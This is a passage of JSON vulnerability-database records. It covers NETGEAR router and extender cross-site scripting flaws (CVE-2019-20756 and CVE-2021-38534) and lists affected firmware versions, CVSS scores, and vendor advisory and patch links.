"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9B77E7-7439-48C6-989F-5E22CB4D3044",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300dst_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "999A4F9A-D803-47D0-94F5-4626669D8DE0",
"versionEndExcluding": "1.0.0.62",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300dst:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C75148EB-DE6C-4C5C-BF34-4800A66CF11C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EFFC911D-B2A3-47D7-940A-76978458CEA5",
"versionEndExcluding": "1.3.0.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0CB1E644-FB4B-443B-B9D7-349F0024FB74",
"versionEndExcluding": "1.3.0.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "97DE1C91-59A0-4902-B5C7-0CFD2631CAEE",
"versionEndExcluding": "1.0.1.32",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4CDF6B-3829-44D0-9675-71D7BE83CAA2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "110B10A0-1969-4FDE-9289-6EAB81D1657B",
"versionEndExcluding": "1.0.4.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "58EFB06D-AD59-4F40-B6EC-BD3C1BCACE7A",
"versionEndExcluding": "1.0.2.94",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "38BC0F78-4571-45E6-9023-CD1AEA7DF8EF",
"versionEndExcluding": "1.0.1.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3400:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "1992E44C-122C-41BC-8FDC-5F9EBEE1FB7C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wn2500rp_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6DFB128D-2F6F-439B-AFE0-FAAE762F008D",
"versionEndExcluding": "1.0.1.52",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wn2500rp:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "1C4C1B98-9551-4862-AEAC-3D5C313BD275",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by reflected XSS. This affects EX7000 before 1.0.0.64, EX6200 before 1.0.3.86, EX6150 before 1.0.0.38, EX6130 before 1.0.0.22, EX6120 before 1.0.0.40, EX6100 before 1.0.2.22, EX6000 before 1.0.0.30, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, R8300 before 1.0.2.94, R7300DST before 1.0.0.62, R7000P before 1.3.0.20, R6900P before 1.3.0.20, R6400 before 1.0.1.32, R6300v2 before 1.0.4.24, R8500 before 1.0.2.94, WNDR3400v3 before 1.0.1.18, and WN2500RPv2 before 1.0.1.52."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por una vulnerabilidad de tipo XSS reflejado. Esto afecta a EX7000 versiones anteriores a 1.0.0.64, EX6200 versiones anteriores a 1.0.3.86, EX6150 versiones anteriores a 1.0.0.38, EX6130 versiones anteriores a 1.0.0.22, EX6120 versiones anteriores a 1.0.0.40, EX6100 versiones anteriores a 1.0.2.22, EX6000 versiones anteriores a 1.0.0.30, EX3700 versiones anteriores a 1.0.0.70, EX3800 versiones anteriores a 1.0.0. 70, R8300 versiones anteriores a 1.0.2.94, R7300DST versiones anteriores a 1.0.0.62, R7000P versiones anteriores a 1.3.0.20, R6900P versiones anteriores a 1.3.0.20, R6400 versiones anteriores a 1.0.1.32, R6300v2 versiones anteriores a 1.0.4.24, R8500 versiones anteriores a 1.0.2.94, WNDR3400v3 versiones anteriores a 1.0.1.18, y WN2500RPv2 versiones anteriores a 1.0.1.52."
}
],
"id": "CVE-2019-20756",
"lastModified": "2024-11-21T04:39:16.957",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 4.2,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-16T22:15:12.977",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000060643/Security-Advisory-for-Reflected-Cross-Site-Scripting-on-Some-Routers-and-Extenders-PSV-2017-0709"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000060643/Security-Advisory-for-Reflected-Cross-Site-Scripting-on-Some-Routers-and-Extenders-PSV-2017-0709"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
var-202108-1661
Vulnerability from variot
plural NETGEAR A cross-site scripting vulnerability exists in the device.Information may be obtained and information may be tampered with. Certain NETGEAR devices are affected by stored XSS. This affects D3600 prior to 1.0.0.76, D6000 prior to 1.0.0.76, D6100 prior to 1.0.0.60, D6200 prior to 1.1.00.36, D6220 prior to 1.0.0.52, D6400 prior to 1.0.0.86, D7000 prior to 1.0.1.70, D7000v2 prior to 1.0.0.53, D8500 prior to 1.0.3.44, DC112A prior to 1.0.0.42, DGN2200v4 prior to 1.0.0.110, DGND2200Bv4 prior to 1.0.0.109, DM200 prior to 1.0.0.61, JR6150 prior to 1.0.1.18, PR2000 prior to 1.0.0.28, R6020 prior to 1.0.0.42, R6050 prior to 1.0.1.18, R6080 prior to 1.0.0.42, R6220 prior to 1.1.0.80, R6230 prior to 1.1.0.80, R6250 prior to 1.0.4.34, R6260 prior to 1.1.0.64, R6300v2 prior to 1.0.4.34, R6400 prior to 1.0.1.46, R6400v2 prior to 1.0.2.62, R6700 prior to 1.0.2.6, R6700v2 prior to 1.2.0.36, R6700v3 prior to 1.0.2.62, R6800 prior to 1.2.0.36, R6900 prior to 1.0.2.4, R6900P prior to 1.3.1.64, R6900v2 prior to 1.2.0.36, R7000 prior to 1.0.9.60, R7000P prior to 1.3.1.64, R7100LG prior to 1.0.0.50, R7300DST prior to 1.0.0.70, R7450 prior to 1.2.0.36, R7900 prior to 1.0.3.8, R7900P prior to 1.4.1.50, R8000 prior to 1.0.4.28, R8000P prior to 1.4.1.50, R8300 prior to 1.0.2.130, R8500 prior to 1.0.2.130, WNDR3400v3 prior to 1.0.1.24, WNR2020 prior to 1.1.0.62, WNR3500Lv2 prior to 1.2.0.62, XR450 prior to 2.3.2.40, and XR500 prior to 2.3.2.40
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202108-1661",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r7900p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.4.1.50"
},
{
"model": "d3600",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.76"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.62"
},
{
"model": "wnr2020",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.62"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.46"
},
{
"model": "r6260",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.64"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.1.64"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.8"
},
{
"model": "r6220",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.80"
},
{
"model": "r6800",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.36"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.34"
},
{
"model": "pr2000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.28"
},
{
"model": "r7100lg",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.50"
},
{
"model": "dgn2200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.110"
},
{
"model": "dm200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.61"
},
{
"model": "r6250",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.34"
},
{
"model": "r6020",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.42"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.28"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.9.60"
},
{
"model": "wndr3400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.24"
},
{
"model": "d6220",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.52"
},
{
"model": "d7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.70"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.62"
},
{
"model": "d6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.86"
},
{
"model": "d6100",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.60"
},
{
"model": "xr500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2.3.2.40"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.1.64"
},
{
"model": "wnr3500l",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.62"
},
{
"model": "r6080",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.42"
},
{
"model": "dc112a",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.42"
},
{
"model": "r7300dst",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "d6000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.76"
},
{
"model": "r6230",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.80"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.36"
},
{
"model": "d7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.53"
},
{
"model": "r7450",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.36"
},
{
"model": "r8300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.130"
},
{
"model": "xr450",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2.3.2.40"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.130"
},
{
"model": "r6050",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "d8500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.44"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.4"
},
{
"model": "r8000p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.4.1.50"
},
{
"model": "jr6150",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.36"
},
{
"model": "dgnd2200b",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.109"
},
{
"model": "d6200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.00.36"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.6"
},
{
"model": "dgn2200",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "d6400",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "d7000",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "d6100",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "dc112a",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "d3600",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "d8500",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "d6000",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "d6200",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "d6220",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-010450"
},
{
"db": "NVD",
"id": "CVE-2021-38534"
}
]
},
"cve": "CVE-2021-38534",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.8,
"id": "CVE-2021-38534",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 1.9,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 1.7,
"id": "CVE-2021-38534",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "cve@mitre.org",
"availabilityImpact": "LOW",
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 0.7,
"id": "CVE-2021-38534",
"impactScore": 3.4,
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.8,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2021-38534",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "High",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-38534",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "cve@mitre.org",
"id": "CVE-2021-38534",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2021-38534",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-202108-946",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2021-38534",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-38534"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-010450"
},
{
"db": "CNNVD",
"id": "CNNVD-202108-946"
},
{
"db": "NVD",
"id": "CVE-2021-38534"
},
{
"db": "NVD",
"id": "CVE-2021-38534"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR A cross-site scripting vulnerability exists in the device.Information may be obtained and information may be tampered with. Certain NETGEAR devices are affected by stored XSS. This affects D3600 prior to 1.0.0.76, D6000 prior to 1.0.0.76, D6100 prior to 1.0.0.60, D6200 prior to 1.1.00.36, D6220 prior to 1.0.0.52, D6400 prior to 1.0.0.86, D7000 prior to 1.0.1.70, D7000v2 prior to 1.0.0.53, D8500 prior to 1.0.3.44, DC112A prior to 1.0.0.42, DGN2200v4 prior to 1.0.0.110, DGND2200Bv4 prior to 1.0.0.109, DM200 prior to 1.0.0.61, JR6150 prior to 1.0.1.18, PR2000 prior to 1.0.0.28, R6020 prior to 1.0.0.42, R6050 prior to 1.0.1.18, R6080 prior to 1.0.0.42, R6220 prior to 1.1.0.80, R6230 prior to 1.1.0.80, R6250 prior to 1.0.4.34, R6260 prior to 1.1.0.64, R6300v2 prior to 1.0.4.34, R6400 prior to 1.0.1.46, R6400v2 prior to 1.0.2.62, R6700 prior to 1.0.2.6, R6700v2 prior to 1.2.0.36, R6700v3 prior to 1.0.2.62, R6800 prior to 1.2.0.36, R6900 prior to 1.0.2.4, R6900P prior to 1.3.1.64, R6900v2 prior to 1.2.0.36, R7000 prior to 1.0.9.60, R7000P prior to 1.3.1.64, R7100LG prior to 1.0.0.50, R7300DST prior to 1.0.0.70, R7450 prior to 1.2.0.36, R7900 prior to 1.0.3.8, R7900P prior to 1.4.1.50, R8000 prior to 1.0.4.28, R8000P prior to 1.4.1.50, R8300 prior to 1.0.2.130, R8500 prior to 1.0.2.130, WNDR3400v3 prior to 1.0.1.24, WNR2020 prior to 1.1.0.62, WNR3500Lv2 prior to 1.2.0.62, XR450 prior to 2.3.2.40, and XR500 prior to 2.3.2.40",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-010450"
},
{
"db": "VULMON",
"id": "CVE-2021-38534"
}
],
"trust": 0.81
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-38534",
"trust": 3.3
},
{
"db": "JVNDB",
"id": "JVNDB-2021-010450",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202108-946",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2021-38534",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-38534"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-010450"
},
{
"db": "CNNVD",
"id": "CNNVD-202108-946"
},
{
"db": "NVD",
"id": "CVE-2021-38534"
}
]
},
"id": "VAR-202108-1661",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.3912442337142858
},
"last_update_date": "2024-08-14T14:44:21.504000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security\u00a0Advisory\u00a0for\u00a0Stored\u00a0Cross\u00a0Site\u00a0Scripting\u00a0on\u00a0Some\u00a0Routers\u00a0and\u00a0Gateways,\u00a0PSV-2018-0244",
"trust": 0.8,
"url": "https://kb.netgear.com/000063758/Security-Advisory-for-Stored-Cross-Site-Scripting-on-Some-Routers-and-Gateways-PSV-2018-0244"
},
{
"title": "NETGEAR Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=159340"
},
{
"title": "CVE-2021-38534",
"trust": 0.1,
"url": "https://github.com/AlAIAL90/CVE-2021-38534 "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-38534"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-010450"
},
{
"db": "CNNVD",
"id": "CNNVD-202108-946"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.0
},
{
"problemtype": "Cross-site scripting (CWE-79) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-010450"
},
{
"db": "NVD",
"id": "CVE-2021-38534"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "https://kb.netgear.com/000063758/security-advisory-for-stored-cross-site-scripting-on-some-routers-and-gateways-psv-2018-0244"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-38534"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/79.html"
},
{
"trust": 0.1,
"url": "https://github.com/alaial90/cve-2021-38534"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-38534"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-010450"
},
{
"db": "CNNVD",
"id": "CNNVD-202108-946"
},
{
"db": "NVD",
"id": "CVE-2021-38534"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2021-38534"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-010450"
},
{
"db": "CNNVD",
"id": "CNNVD-202108-946"
},
{
"db": "NVD",
"id": "CVE-2021-38534"
}
]
},
"sources_release_date": {
"@context": {
